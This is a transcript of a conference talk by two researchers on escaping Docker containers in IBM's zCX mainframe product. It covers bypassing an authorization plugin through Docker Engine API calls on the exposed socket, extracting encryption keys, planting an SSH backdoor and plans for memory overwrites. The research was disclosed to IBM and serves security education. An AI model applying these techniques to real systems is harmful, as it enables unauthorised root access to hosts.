- Hi, I’m Ian. I do container things.
00:04 - - Hi, I’m Chad. I do mainframe things.
00:07 - - And we’re here to tell you a story today about some things we did together.
00:12 - We both live in Minneapolis, Minnesota, which is a cold dark place, where it’s winter six months out of the year.
00:19 - Minnesotan hackers spend their long winters stuck inside, doing deep dive studying ancient Arcana and getting good at deep magic, which lends itself well to weird specializations, and that’s how we ended up here.
00:33 - It all began in spring 2019. Like many good things, it began with a shit post.
00:40 - A person involved in DevOps said Kubernetes is the next mainframe.
00:44 - So of course, I tagged Chad and it was like, what do you think? I’m not qualified to speak on mainframes.
00:50 - I’m about as qualified to speak on mainframes as I am on beekeeping.
00:53 - I think I’ve gotten a little better at it since, but anyway, a few days later- - A few days after that shit post, we met at a local con for the first time in-person and talked about our niche specializations, the similarities and differences between them.
01:09 - Although our worlds don’t usually overlap, the cultures are different, the timeline is different, I mean, mainframes have been around since the 50s and Kubernetes have been around for like what? Six or seven days? Our approaches had some similarities and we both knew we had some knowledge in common.
01:25 - In the mainframe world, it’s not uncommon to patch the systems maybe once, twice a year.
01:31 - - And in the DevOps world, people do multiple deploys a day.
01:34 - Culturally, it’s really different. DevOps people are really open to new things, open source software, really excited about doing things quickly and doing new stuff and mainframes, maybe not so much.
01:44 - - No one would ever accuse the mainframe community of being excited about change.
01:49 - - Fair enough. - Both of us had experienced pulling things off that other people said were completely impossible in our respective fields.
01:56 - We figured out how to navigate an uncharted territory.
01:59 - We took apart technology without dedicated tooling and with little or no prior art.
02:05 - - We did have some things in common though.
02:06 - We had shared knowledge of Linux hacking, which ended up becoming helpful for this project later because containers are made out of Linux features and mainframes use Unix filesystems too.
02:16 - We joked about whether or not we really could prove that guy wrong, about Kubernetes being the next mainframe, but I didn’t really think we would ever get to do our thing together because honestly, who puts containers on a mainframe? Well, the joke was on me because just a few months later, in fall 2019, IBM announced z/OS Container Extensions, which we will be referring to from here on out as zCX.
02:41 - So we made it into a winter project. Joining forces and combining our very specific particular sets of skills, we were able to become the first people on the planet to escape a container on mainframe, and that was just getting started.
02:55 - This talk is about how we did that. It’s a talk about friendship, collaboration, cross-disciplinary skill sharing and figuring out how to escape containers on the moon.
03:04 - But first, a couple of things. - It would violate the laws of physics and math to fit all of the technical background that Ian and myself had about our two niche disciplines into the amount of time that we have for this talk.
03:17 - However, we have not figured out how yet to do this, but we’re making a lot of progress and we’ll make a note of it for future talks.
03:24 - So we’re not doing that today. We encourage people that are interested in finding out more to check the resources in our reference sections, or if you’re seeing this in-person come around and ask a question.
03:35 - There’s a lot of ways to attack this thing that we’re not gonna be covering today, but we reserve the right to not answer questions about those.
03:43 - - If you’re not here in-person and you’re watching this virtually now or later, we’re around the interwebs too, you could probably find out probably Twitter.
03:49 - - Probably Twitter, yeah. Speaking of which, we disclosed this to IBM and IBM sent us a formal statement about it.
03:58 - To our knowledge, this is unprecedented. So we figured we would share it here.
04:02 - ‘Cause it’s from IBM. - Yeah, I’ve disclosed vulnerabilities to IBM in the past and friends of mine have also disclosed vulnerabilities to IBM, specifically, for System Z and they never get talked about publicly.
04:14 - This is fantastic, I really appreciate this, and I hope they do this again in the future.
04:19 - - So yeah, that was pretty cool. Anyway, let’s get to it.
04:23 - So what is this thing? Containers on a mainframe? What? That’s weird.
04:30 - - First off, let’s do some myth-busting. Mainframes still exist, they’re widely used and the tech is more modern than you think.
04:37 - Unix or AIX has been ported and running a mainframe since the early 90s and now, there are actual containers that run inside an address space on IBM’s most prevalent mainframe OS z/OS.
04:50 - Every one of you used a mainframe today or in-person on the way here if you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe.
05:02 - IBM’s product name for this is zCX. I’ll explain what that is, but first, let’s do some super basic mainframe primmer.
05:10 - The mainframe we’re referring to today is IBM’s flagship System Z.
05:16 - The operating system is known z/OS. Some site, excuse me, sometimes it’s still called MPS by us old timers.
05:22 - It runs most of the mainframes on the planet and it runs a unique architecture called z/Architecture.
05:28 - Within this OS, the basic unit of user or process separation is known as an address space.
05:34 - zCX is a custom hypervisor, which emulates z/Architecture and runs in its own address base on z/OS.
05:42 - Atop zCX, there is a customized barebones Linux image running Docker containers.
05:48 - IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers.
05:58 - So, Ian, what’s a container? - [Ian] What is a container? First of all, let’s talk about what it’s not.
06:06 - A container is not the same thing as a virtual machine.
06:09 - Containers don’t have their own kernels or standalone resources, at least most of the time.
06:14 - Containers share resources with each other and with their hosts, and unlike a virtual machine, if you kill a container process, you kill the entire container.
06:22 - Docker is the most common container engine, but it’s not the only one, and they can vary pretty widely in implementation and behavior.
06:28 - Some of them even have hypervisors. zCX does use Docker though, so that’s what we’re going to be talking about today.
06:34 - This isn’t the first time Docker containers have been run on mainframe computers.
06:37 - Docker has been running on bare metal Linux instances on mainframes for a minute, but that’s just plain Linux.
06:42 - zCX is different because it’s the first time containers have been run on z/OS.
06:48 - But what is a container anyway? Well, a container isn’t really a thing at all.
06:53 - They’re basically a set of native Linux features that are put together in order to isolate a process.
06:58 - These features are cgroups and namespaces. Cgroups determined what resources a process is permitted to use like CPU and memory.
07:06 - Namespaces determine what a process is permitted to see, like directories and other processes.
07:11 - Together, cgroups and namespaces make up what we call a container, which is really just an isolated process.
07:17 - Containers as a concept don’t really exist in the Linux kernel.
07:20 - As far as the kernel is concerned, a container is no different than any other process running on the host.
07:26 - What this also means is that you can look at a container process like you could any other process at the Linux host.
07:31 - For this demo, we’ve already escaped to the zCX host, so we’re looking from there.
07:37 - So let’s run a container with the name honk command sleep 1312.
07:41 - The honk isn’t really necessary here, I just wanted to honk at you.
07:44 - If we list our containers, we can then see that container running.
07:48 - We can see this or any other container on the outside by running a PS command, which will show us containers running on the host alongside other processes.
07:56 - This command output will give you the process ID, the user running it, the PID namespace number and the command line argument.
08:02 - If we want to take a look at the inside of the container, we can do so by looking at the proc and S folder for the process ID of that container.
08:10 - We found the PID of the container we just created in the PS command output we just ran.
08:14 - Let’s take a closer look. We take a look here, we can see the cgroup at the top and the other namespaces on the bottom.
08:21 - All processes on X are made up of these namespaces.
08:24 - As of kernel version 5. 6, there’s also a time namespace, but zCX runs it old ass kernel, so this demo won’t show you that one.
08:31 - Depending on the configuration and how the container was created, some of these namespaces might be shared with the host and some might be unique to the container.
08:38 - We’re not going to get into that here, but I recommend checking out the resources in the reference section to learn more.
08:44 - And that’s it. Honestly, that might be the closest thing you’re ever going to be able to get to being able to actually look at a container because that’s all a container is, a process made up of cgroups and namespaces.
08:56 - Because containers do share resources with one another and their hosts, containers present a wide and varied attack surface where if a container is compromised or misconfigured, containers can compromise each other and their hosts.
09:07 - I just think they’re neat, they’re fun to break.
09:09 - So let’s talk about breaking some. So how to break this thing anyway.
09:16 - We approached zCX from both ends using our respective knowledge and skill sets, and we ended up taking zCX completely apart from both the container side down into the mainframe and the mainframe side up into the containers.
09:29 - But first, before we did anything else, Chad set up a lab in the cloud.
09:32 - - It’s true. It was a complicated lab and it took a while to get it going.
09:37 - Let me explain. We had to build a cloud-based z/OS environment with the latest zCX code release.
09:44 - We used IBM’s zPDT that stands for z Personal Development Tool.
09:49 - It’s a virtualized platform that emulates z hardware and runs atop Linux.
09:55 - On top of the zPDT, we loaded the newest z/OS version, fully patched it and we’re able to install and run zCX in the cloud.
10:03 - So it looks a little bit like this. Atop of Leno, which is a hosting provider, we run a Linux instance.
10:09 - Running that Linux instance is zPDT. On top of zPDT hypervisor is z/OS.
10:16 - Within z/OS, there’s an address space, which runs the zCX hypervisor.
10:21 - Atop that, runs a Linux instance, and in that, runs Docker on Docker, and that’s our research environment, simple.
10:29 - - Something along those lines, yeah. So, but to really be able to attack this, we needed to level up our skill sets.
10:38 - So we started out by cross-training each other.
10:40 - We set aside time to share skills and get each other up to speed enough to be dangerous because for me, I didn’t really know how to do anything with a mainframe.
10:49 - - I couldn’t spell Docker. - But you’re good.
10:53 - And so, we needed a little bit of help getting each other up to speed.
10:57 - So we started doing that. First thing, I took Chad’s Evil Mainframe class.
11:03 - Chad’s a really good teacher. It’s a really good training.
11:05 - If you ever get the chance, I recommend it.
11:07 - It’s offered as such cons that you may or may not have heard of like BlackHat every once in a while.
11:12 - So the training is multiple days long. It goes over the history of mainframes, how everything works and there was a CTF at the end.
11:19 - It was really good, I had a really good time with that.
11:21 - Mainframes were brand new to me. I had never touched one before.
11:25 - I had never really had an occasion to. I’m used to bleeding edge cloud native tech stacks.
11:30 - That old stuff never really comes into play for me at work, and while Unix system services felt familiar enough, the older stuff was wild.
11:38 - I had never seen or dealt with architecture like that before.
11:40 - It was so foreign to me, it might as well have been made on the moon.
11:44 - I learn in systems. So it took me a little while longer to ramp up at first, until I figured out how the whole thing works together.
11:50 - Chad was very patient with this. I did get there eventually.
11:54 - I still got the mainframes though. - Don’t let Ian fool you.
11:57 - They picked up mainframes super fast, as good as anyone I’ve seen.
12:03 - The next thing was for me to train up on containers, and Ian helped me do the Secure Kubernetes CTF.
12:09 - I’d done only a little bit of work on Docker before, generally with CTFs and the like.
12:15 - It’s always seemed like a little bit of magic to me.
12:18 - Working with Kubernetes and Dockers and the Secure Kubernetes CTF really helped me make some sense out of it.
12:24 - It did bring me back to my beginning mainframe days.
12:27 - I mean, this is complex and a really steep learning curve of a bunch of abstract concepts.
12:34 - I still put my overall understanding of Kubernetes at like 5% maybe and containers somewhere in the neighborhood of maybe 30%, but working side by side with Ian has really helped me.
12:46 - They always stopped to take the time to answer my questions, very detailed answers and examples.
12:52 - I definitely would not have wanted to embark on this without their guidance and patience.
12:58 - - Don’t let Chad fool you either. He took right to it because he already had a base of Linux knowledge and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast.
13:11 - It was really fun to watch, and it was really fun to get to come up with a curriculum to train you ‘cause I’m not a professional trainer.
13:17 - That wasn’t really something I had done before, so it was cool to like come up with one for ya, to teach you everything, or at least some of the things.
13:24 - Anyway, so after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product.
13:31 - Working together but separately, we looked at our respective spaces.
13:35 - I looked at the containers. - And I looked at the mainframes.
13:39 - - And we tried to figure out how to get into it.
13:42 - - But the mainframe, and I started with the initial provisioning of zCX.
13:47 - This is where the primary image files live in the Unix subsystems on the mainframe.
13:52 - This is where you initiate zCX. You provision it, and thus all of the artifacts that might be interesting to us are stored here.
14:02 - I offloaded these files used to build the root zCX filesystem to a Linux box, and then I could take them apart with the proper tools.
14:10 - I fired up my exotic hacking tools like strings.
14:14 - I quickly discerned that the core of these image had two main parts, a whole bunch of Bash scripts and a bunch of Linux disc images.
14:23 - I extracted and examined these Bash scripts alongside the job log, which shows messages as zCX launches.
14:31 - Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up on the job log.
14:38 - What to do? Well, going back to the Bash scripts, I looked and there was this super helpful line near the top of the first bootloader script that gave away the secret.
14:47 - Uncomment this line to enable debugging output.
14:49 - Thanks developers, who said being a hacker was difficult? All you have to do is just learn how to read.
14:56 - So I patched this binary, put it back on the mainframe and re-provisioned a new zCX, fabulous.
15:03 - The job log sped out all of the debug for all of the bootloader stages.
15:08 - There were so many messages though about keys and decryption.
15:12 - My interests was piqued and the hunt was on.
15:16 - I patched the Bash script up again and started looking for the initial decryption keys.
15:21 - I used the tried and true hacker skills of echo privatekey. pem, and I dumped the first of several encryption keys to the job log.
15:28 - However, I couldn’t fully reverse the filesystem yet because despite being able to echo these keys in the initial bootloader processes to the job log, I couldn’t actually find the keys in the filesystem.
15:41 - It’s a pretty complex setup. So I could copy the keys one by one out of the job log, but this is a colossal pain in the ass.
15:49 - For the moment, I was stuck and I turned it back over to Ian.
15:52 - - So looking at the container set up, I immediately saw some things that looked promising.
15:57 - First of all, the initial user was in the Docker group, which is a security host so fundamental, it literally comes with a warning label on every new install on z/OS.
16:07 - Somebody had to have seen this label and actively ignored it.
16:10 - Wow, okay. So, sweet, this looks good.
16:14 - Moving on. The container setup that zCX has was Docker and Docker, which has known security holes, especially in certain configurations.
16:24 - There are a couple of approaches to Docker and Docker.
16:27 - It can mean running the Docker daemon inside a container, running inside another container or it can mean running only the Docker CLI or the Docker STK in the container and connecting it to the Docker daemon on the host.
16:40 - zCX has a set up like the latter one. The approach to Docker and Docker that zCX uses has a few different no drawbacks and some known security holes, because in this setup, the container running the Docker CLI can manipulate any containers running on the host.
16:56 - It can, for example, remove containers, it can create privileged containers that allow root equivalent access to the host and zcxauthplugin, which was part of their security model, tried to account for this, but it didn’t quite work entirely.
17:14 - Wait, what? I hadn’t mentioned zcxauthplugin yet.
17:17 - What’s up with this? Let’s get there.
17:19 - So I had looked at this and realized pretty quickly that it wasn’t completely wide open.
17:25 - My first attempts of doing this sort of like most bog standard kind of like, okay, can I run a container that is privileged in here? Can I execute a command as root? That kind of thing, we’re blocked by this Docker authorization plugin that they were using called zcxauthplugin.
17:40 - Zcxauthplugin did a few different things, blocked privileged containers, blocked executed commands as root, it also blocked mounting the host path as a rewrite (indistinct).
17:49 - Okay, fair enough. But I knew there had to be a way to get into this, because honestly, just look at that setup and I wanted to figure out how the thing worked.
17:56 - So as I do, I went to the docs and as they often do, the docs pointed the way, quite literally.
18:05 - IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do because they adversely affected security features or may compromise the product.
18:16 - Well then, thanks IBM. I appreciate the tips.
18:20 - I was clearly going to have to try all of those immediately.
18:23 - The language in the docs at the time claimed that it was not possible to become root or access or modify the Linux host, but I knew that it was possible because they gave enough information that way about their system to tell me so.
18:36 - Here’s why. For one thing, what zcxauthplugin blocked gave me very specific error messages.
18:43 - For another thing, the commands they were blocking through zcxauthplugin were very specific, which pointed to a specific set of system configurations and also as a possibility maybe that they might be blocking through pattern matching rejects.
18:56 - Really? This was like trying to prevent SQL injections by banning the string 01 one equals one without banning other things like for example, and one he was one or parameterizing queries on the backend or anything else, like one by two with SQL injections.
19:13 - Even if it is possible to prevent all attacks via trying to block known bad syntax, which I think those people here can probably guess that it’s not because there’s lots of ways to bypass that, it was also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant.
19:32 - And in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers.
19:41 - Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn’t mount host resources.
19:48 - Okay, I already knew that the plugin tried to block that one.
19:52 - It also mentioned that var/run/docker. sock was read-only.
19:56 - Oh, that was the key to the front door. Let’s talk about the Docker socket for a minute.
20:04 - The Docker socket is a known security hole, if you leave it exposed, to, for example, users in the Docker group.
20:13 - This gives that user root equivalent access to the host.
20:16 - And read-only for the Docker socket is not a security boundary for a couple of reasons.
20:22 - One, you can make a whole volume read-only and all of the files in a folder read-only, and that doesn’t actually affect sockets because sockets don’t work that way.
20:31 - Also, the Docker socket in particular has an API layer that you can make calls to and an entire Docker Engine API for commands that you could execute to it while making those calls.
20:41 - And in the commands that the docs had mentioned blocking, they didn’t mention any of the syntax around the Engine API at all.
20:52 - So I made a cURL call. Creating a new container that mounted the host path as a rewrite bind mount via Engine syntax.
21:00 - And hey, it worked. So I knew that making calls could work and that binds was an option they missed.
21:06 - Sweet. But when I tried shooting out into the host system, it didn’t quite work the way that I wanted it to, because they had enabled username space remapping.
21:14 - What this means for my purposes is that once I was out of that namespace, even though it said I was root, I couldn’t really do anything meaningful in that namespace, and they had locked down the (indistinct) file real hard, which was running weird permissions errors that I haven’t seen before.
21:28 - So that was kinda odd, but okay, maybe this one wasn’t gonna work, but at this point, I knew I was getting somewhere.
21:36 - I’m gonna take a second here to explain usernames-based remapping because it’s important.
21:40 - Linux namespaces provide isolation for running processes.
21:43 - They limit their access to system resources without the running process being aware of the limitations.
21:49 - You don’t want to run your containers as a root user generally.
21:53 - It is not a secure thing to do, but sometimes for various system reasons, you get a container in which something has to run as root.
22:00 - So for those containers whose processes have to run as the root user within the container, you can remap this user via username space remapping to a less privileged user on the Docker host.
22:09 - The mapped user is assigned a range of UIDs, which function within the namespace as normal UIDs from zero to 65536, but they have no privileges on the host machine itself.
22:19 - This was why, even though I was theoretically running as UID zero, I couldn’t really get anywhere.
22:25 - So knowing that the API calls could work to the Engine API, but that username space remapping was kinda cramping my style, I figured I’d try something else.
22:35 - I tried a user namespace host option through the API, because sending usernames space to host bring you to a namespace remapping.
22:42 - This option was blocked by the plugin when I had tried it before in a Docker run command, but via the API it worked.
22:49 - And this time when I got in, I had full root access to all the host resources.
22:55 - Wow, this system really needed more defensive depth and appeared to have been built upon the assumption that no one could ever become root on the host.
23:03 - What? They really believe their own propaganda, so nothing was really locked down on the backend by that point.
23:09 - Once you were in, and once you were root, you could really do whatever, and it was kinda fun actually.
23:15 - I haven’t really had that much fun running around the environment since early Kubernetes, which was similarly locked down, and I hadn’t gotten to do that in a while since Kubernetes improved, so that was fun for me.
23:27 - Anyway, the first thing I did once I had access to the host filesystem, was looking inside the Root folder because, why not? And in the Root folder, there was another folder called Root Keys.
23:37 - Well, that sounded great. Obviously, there was gonna be something interesting in Root Keys, so I took a look in there and I found a product key called IBM Encapsulation Private PEM.
23:48 - Didn’t quite know what that was, but I think he’d probably viewed it, so I went and handed it to Chad, figuring it might be useful.
23:55 - Chad then took the key, reverse engineer, the COBOL or something, and then we had a system to look at.
24:01 - - Right. So it wasn’t exactly COBOL, but it was pretty complex.
24:06 - - So it was like a Fortran, right? - Exactly, it was Fortran.
24:08 - Thank you. - It was not Fortran. - Ian had found the key that I was looking for, and once I had the key, I could finish reverse engineering the root filesystem and then I was able to look at this in more depth.
24:20 - The root filesystem bootloader processes are a myriad of Lux encrypted filesystems, initramfs filesystems, wrapped encryption keys and a whole bunch of scripts putting it all together.
24:34 - After parsing it all and reassembling the unencrypted filesystems on my Linux box, I had a moment and realized what this was.
24:43 - This is IBM’s secure service container, or as it used to be called, z Appliance Container Infrastructure, zACI.
24:50 - IBM Secure Service Container is an offering that they sell for Linux, LinuxONE where it runs directly on bare metal IBM mainframes as a secure appliance.
25:02 - The filesystems were littered with these acronyms.
25:04 - It dawned on me that what they had done was taken this, and this is why there was this wild maze of keys and encryption and scripts.
25:12 - They lifted this SSC, which normally has its initial decryption keys inside of hardware service module, and poured the whole thing to software on a disc.
25:22 - IBM normally builds these hardware enclaves, but it’s harder to do that in the cloud.
25:27 - - As it turns out you can’t actually lift and shift things into the sky.
25:33 - What we were coming to find out is that the security model in zCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways.
25:42 - Since containers share resources with each other and their hosts securing for containers requires a holistic approach.
25:49 - Any given container system is only as secure as any given part of the stack, really, every part of the stack.
25:56 - You have to have defense in depth in every layer on a container system.
25:59 - Containers are literally made out of layers, but that means that you not only do you need to, but that you can do every little bit at a time.
26:09 - - This is somewhat different security model than that on a mainframe.
26:13 - The mainframe security model is really granular.
26:15 - You can configure security on literally anything on the mainframe, however, it’s also a monolith in it’s security model and it can be very binary, like a light switch.
26:26 - Defense in depth on the mainframe can be really difficult if you have made any security configuration errors that would allow you to basically bypass all of the security controls because you screwed up one or two really key important things.
26:39 - - I think those are wild. - They’re wild.
26:43 - - So the differing approaches to these two security models came into play with the way that zCX got built, and these two combined in some somewhat unexpected ways, and the way they got combined led to some somewhat unexpected behavior for both of us.
26:59 - So we worked together, passing things back and forth.
27:03 - When let either of us ran into the limits of our knowledge or saw something that didn’t really make sense in the respective contexts we were used to, we would pass the problems with the other person, who would recognize it from their knowledge and context, and then we would do it again.
27:17 - So back to the container system, and in there I have full read access, but I was having a hard time understanding some behavior that I was running into.
27:25 - The Docker service kept throwing these weird Systemd errors I hadn’t seen before and my debugging tools weren’t really helping in helping me figure out why.
27:33 - I wasn’t really sure what was up with this.
27:35 - - Meanwhile, on the mainframe side of things, I found this directory in etc Systemd services have these weird permissions on it, 644, which any of you Linux people with know that 644 is kind of odd permissions for a directory because the execute bit isn’t set.
27:52 - I found this because I was copying it from a Linux box to another directory and my copy command through an error because it couldn’t copy that directory.
28:00 - Why would you want a non-executable directory? I’d never seen this before.
28:03 - I showed this to Ian with a comment about how strange I thought this was.
28:07 - - Oh, huh, okay. This partly explained the errors that I had been getting with the Docker service, that I haven’t been able to figure out, sort of.
28:15 - The permissions bit made sense in a container context.
28:17 - 644 are actually pretty standard permissions for the Docker service, for compliance reasons, but this particular service didn’t quite act the way that I would normally expect it to.
28:27 - The Docker service interacting with several other Systemd services.
28:30 - One of the services it was interacting with was called zcxauthplugin. service.
28:35 - So I took a look at that. I wanted to know how this plugin worked and could we disable it? Docker authorization plugins aren’t super commonly used, but the ones that I had seen, which were open source generally behaved in pretty similar ways.
28:49 - This authorization plugin was different. It was closed-source and it interacted with Systemd as a service in a way that I hadn’t seen before.
28:56 - It kept making these calls back and forth and running against a list of string magic text.
29:02 - What the fuck? This wasn’t common behavior in container context at all.
29:06 - I had never seen such a thing. - Ian explained this to me and it occurred to me that what was going on here might have a similar corollary in the mainframe world, specifically mainframe exits.
29:19 - Let me explain. So within z/OS, there’s a concept of an exit.
29:24 - What an exit is used for is if you wanna do some really specific customization to some part of the system.
29:30 - An exit is literally a program that you write usually in Assembler or C, maybe C++, that is called from an API in some kind of system routine.
29:41 - So the way it works is, let’s take an example, a password processing routine.
29:46 - So Ian’s gonna change their password on the mainframe to sparkle.
29:49 - So they type in the password sparkle, the mainframe then says, “Okay, that’s fine, but I see that there’s an exit defined for password compliance. ” So it will call them the program that I wrote, and in my program, the mainframe exit for password policy, I’m gonna check all kinds of things.
30:05 - Is this word part of the dictionary list? Is it the month? Is it the current year? Is it Ian’s name? Things like that the system wouldn’t normally check, and if it is okay, I’m gonna pass back a return code that says, “That’s fine.
30:19 - Ian can you sparkle. “ Or if it’s not good, I’m gonna say, not good, and I’m gonna make them change their password back to something else.
30:25 - So I explained this to Ian, and I said, I think what’s happening here is that the programmers who know how to write exits to modify and control system behavior have written an exit in the zcxauthplugin and that’s how they’re trying to control the security at this product.
30:42 - - Wild. - Meanwhile, I was also looking at the zcxauthplugin, but I was looking at the binary.
30:49 - And the first thing that I noticed was that it was huge.
30:52 - I mean, listen, normally on mainframes, things are built with really tight assembly code or C code, the binaries, even for super complex mainframe systems are small.
31:04 - Because of this reason, take example of the nucleus on a mainframe, which is kind of like the kernel, like the core bit that tells everybody what to do.
31:11 - It’s maybe 50 megs on the main frame and the zcxauthplugin is six megs.
31:17 - I started dumping it in and looking at it with a hex editor and a disassembler, and there’s all kinds of calls in here to things that have nothing whatsoever to do with, doctor or security, and I was like, what is going on here with this thing? So I called it back to Ian and I said, what is this? What’s happening here? - This is what I knew, it was a Go binary.
31:38 - They were thick like that. They have a lot of dependencies, they make a lot of extra calls, that’s normal for Go.
31:44 - At one point, I tried to Docker pull the image for Golang and I crashed our entire lab for disk space.
31:51 - Oops. I was unfamiliar with these kinds of size constraints because I’m used to Go, it’s big.
31:57 - And so, although I recognize the Go patterns in the code that made sense to me, some of what that code was doing looked kind of weird.
32:05 - I was like, it looked unfamiliar in a way that at this point, I had learned to figure out, probably meant it was doing something kind of weirdly mainframe specific just by the fact that it was Golang thing that I might otherwise be used to seeing.
32:18 - So at this point, I think we all knew, this was clearly going to keep happening and we were going to need to get a deeper looking at the system together, but to get into the system as deep as we wanted to, we were going to need persistence and tools.
32:31 - - So we made a lab version of zCX and we ripped out all of the security features that IBM had left behind for us.
32:39 - We disabled the zcxauthplugin, we disabled user namespace (indistinct) remap, we made all of the read-only mounts into rewrite mounts, we stored this filesystem onto a mainframe dataset.
32:50 - We added a debugger, we got APT up and running so we can update the software and install new applications and programs, and I even, very proud of this, figured out how to make SSH run on the root filesystem by copying the sshd binaries and the corresponding libraries out of the Docker overlay filesystems and running them in the root filesystem, so we had a direct backdoor into the root filesystem and could commence doing a little bit deeper research.
33:18 - - We’re still doing more with that. So where do we go from here? Well, we have a to-do list as we’re still working on this project.
33:27 - We have a couple of obvious points to attack that we’ve already gathered some information about and maybe some less obvious buttons that we won’t be talking about here.
33:35 - - One of my favorite things is disassembling a reverse engineering code.
33:40 - So disassembling the zcxauthplugin is something that I’m absolutely looking forward to.
33:45 - However, it’s written in Go and it’s on an architecture using tools that were not really designed for that architecture.
33:52 - Let me explain. If you look at any of the open source tooling designed for mainframe, what you’ll see is the architecture not listed as zArchitecture, but listed as s390X Architecture.
34:02 - They are the same thing. In open-source parlance, s390x equals zArchitecture.
34:08 - And even though I have things like (indistinct) and GDB and that sort of thing, when I disassemble these binaries, I’m gonna end up with z Assembler code, not x86, not AMD, but z Assembler code.
34:20 - So this is gonna make it quite a bit more complicated to get through, but doing this I think is gonna open up some obvious pointers to other security vulnerabilities.
34:30 - - s390x architecture kept coming up and kept kinda throwing wrenches at things throughout this process because open source tooling sometimes supports s390x, but a lot of the time it doesn’t, and honestly, for really hell of reasons.
34:44 - Open source developers often who are working for free are like, “I don’t work for IBM, why would I work for something that is specific to IBM architecture? They’re not paying me to do this.
34:55 - If you want people to do this, you can hire people to do this. “ And therefore, a lot of tools just aren’t supported.
35:01 - That kept coming up as I kept running into like, okay, I’m going to go get this open source tool that I’m used to using and having it be like, no, and have some sort of terrible architecture failure, like seven layers down the stack.
35:11 - It was kinda cool for learning and also a pain in the ass.
35:14 - Anyway, the real goal here for us would it be a full hypervisor escape, which we believe can be done.
35:22 - zCX runs in an average space within z/OS and that address space runs as authorized.
35:28 - Let me explain what this means. In a mainframe context, running as authorized means something specific.
35:34 - It’s like security through the filesystem. So if you had a folder on Linux where anything that was in that folder automatically ran as a UID zero as root, and not only that, it had root access to everything else in the system, that’s actually how mainframe authorized address spaces work, which is wild.
35:54 - And what this means is that if we can get code execution in that address space, which frankly, we believe that we can, we will be able to own the entire mainframe server, all of it, everything.
36:05 - We already know that there are direct memory links.
36:08 - IBM helpfully, provided us this hideously ugly diagram in Comic Sans telling us so, and also we know because of this demo.
36:19 - - Okay. Just gonna show you a quick demo on what we think might be possible in the future.
36:23 - We’ve done a little research on the shared memory links between zCX and z/OS.
36:29 - We know the exist, they’re in some of the diagrams and the documentation talks about it, but we found one of particular instance we’d like to show you now.
36:35 - So this demo is basically just giving you kind of a window into what might be possible by way of just kind of a fun demonstration.
36:45 - So if you log into our backdoor of our zCX instance, so this is an SSH server that I booted up that’s just running on the root level of the zCX instance now, not bothering having to go back in through Docker and escape down to the root instance, we’re just running an SSH Daemon directly from it now to get in and out as part of our research environment.
37:07 - And I’m gonna run some hackery commands from the zCX instance that I’m not gonna show today.
37:12 - And just to give you an example of what we think is possible, let’s log back into the mainframe system.
37:17 - So I’m gonna go log in with my TSO ID onto our mainframe.
37:25 - And once I’m into TSO, I’m gonna launch ISPF, which is kind of the green screen that everybody associates with mainframe, and is still probably the primary means of accessing the mainframe, and I’m gonna go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named Moon, which is the zCX server that we’re looking at.
37:48 - So if I scroll down in this job log and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in zCX, and my ability to write to memory inside of z/OS.
38:02 - I’m placing the goose there at the end of that job log.
38:05 - So the demonstration here was basically just to show you that what we’ve done is we’ve gone down through the Docker Engine, into the root Linux container, what’s labeled here is Linux Kernel.
38:17 - And that we know there are a memory connections between that kernel through the zCX hypervisor and z/OS.
38:23 - And so our next project is really to try to figure out how to take advantage of that and do memory overwrites and gain access, then full access to an authorized address space within z/OS.
38:34 - Doing so will give us access to then all of the data, the programs and everything running on z/OS, which is ultimately, the end goal.
38:45 - We couldn’t wrap this up without discussing what we’ve learned.
38:49 - None of this or any of the future work that we will do would be possible without the sparkling partnership between Ian and myself.
38:57 - And I have to add a side note, that I think I’ve said sparkling in this talk more than I’ve ever said it my entire life, when I wasn’t ordering a drink.
39:02 - - It’s all a glitter (indistinct). - It is indeed, there’s a lot of glitter.
39:06 - Here’s what I learned. In my niche world, I’m often the expert that people come to for input.
39:11 - I liked this, I worked hard for it. I like the recognition that comes with this.
39:15 - I admit, I find it hard to ask for help or admit that I don’t really know where to start on a thing, especially if it’s something that I could probably figure it out on my own eventually, but maybe it would take me six months or a year.
39:31 - I don’t know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you and being humble.
39:41 - This is hard. This is hard for me, and maybe it’s hard for some of you, but it’s been a really good experience.
39:48 - It’s been really good for me. I’d like to encourage all of you watching this to do this too.
39:54 - Be vulnerable, ask for help, be humble, even when it’s hard.
39:59 - It’s not only okay, but the outcome can and likely will be better than going in alone.
40:06 - - I’ve learned too. I’m more used to asking for help.
40:10 - I work collaboratively a lot. I’m a member of a hacker crew called SIG-Honk, greets Honk, and so we worked together all the time and admit when we don’t know things and ask for help and do that a lot.
40:22 - So I was more used to that. What I wasn’t used to was working with people who have a skillset that overlaps a little with mine.
40:30 - ‘Cause usually when I do collaborative work, I do it with other container people, and it’s been really awesome to get to work with somebody who has knowledge that is so new to me and is so different from mine.
40:41 - I’ve gotten to learn so much from you and it’s been great.
40:43 - And to me, I felt really inspired by that. I think we both have, about what kinds of possibilities this could lead to for people, because we don’t always think about this, right? We hang out with people in our bubble, maybe they do the same kind of things we do.
40:58 - Maybe they’re a lot like us, and if we start working more closely with people who are really different from us, either in just their skillset or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that in a way that is really awesome.
41:15 - And if we all start doing that more, we can learn more from each other and we can build and break things more amazingly and things that wouldn’t have been possible before, if we can work across chasms in that way.
41:29 - So that’s been really sweet and we want to encourage you all to do that too, because what can you do together? What can you build? What can you break? There are infinite possibilities and we really want to see what you can do with that.
41:43 - We want to see what we all do with that. I don’t think we do it as enough as an industry.
41:48 - So let’s find each other. Let’s make things happen.
41:51 - You and a small crew of committed friends can change the world.
41:55 - The secret is to really begin. Thank you.
42:00 - - Thank you. .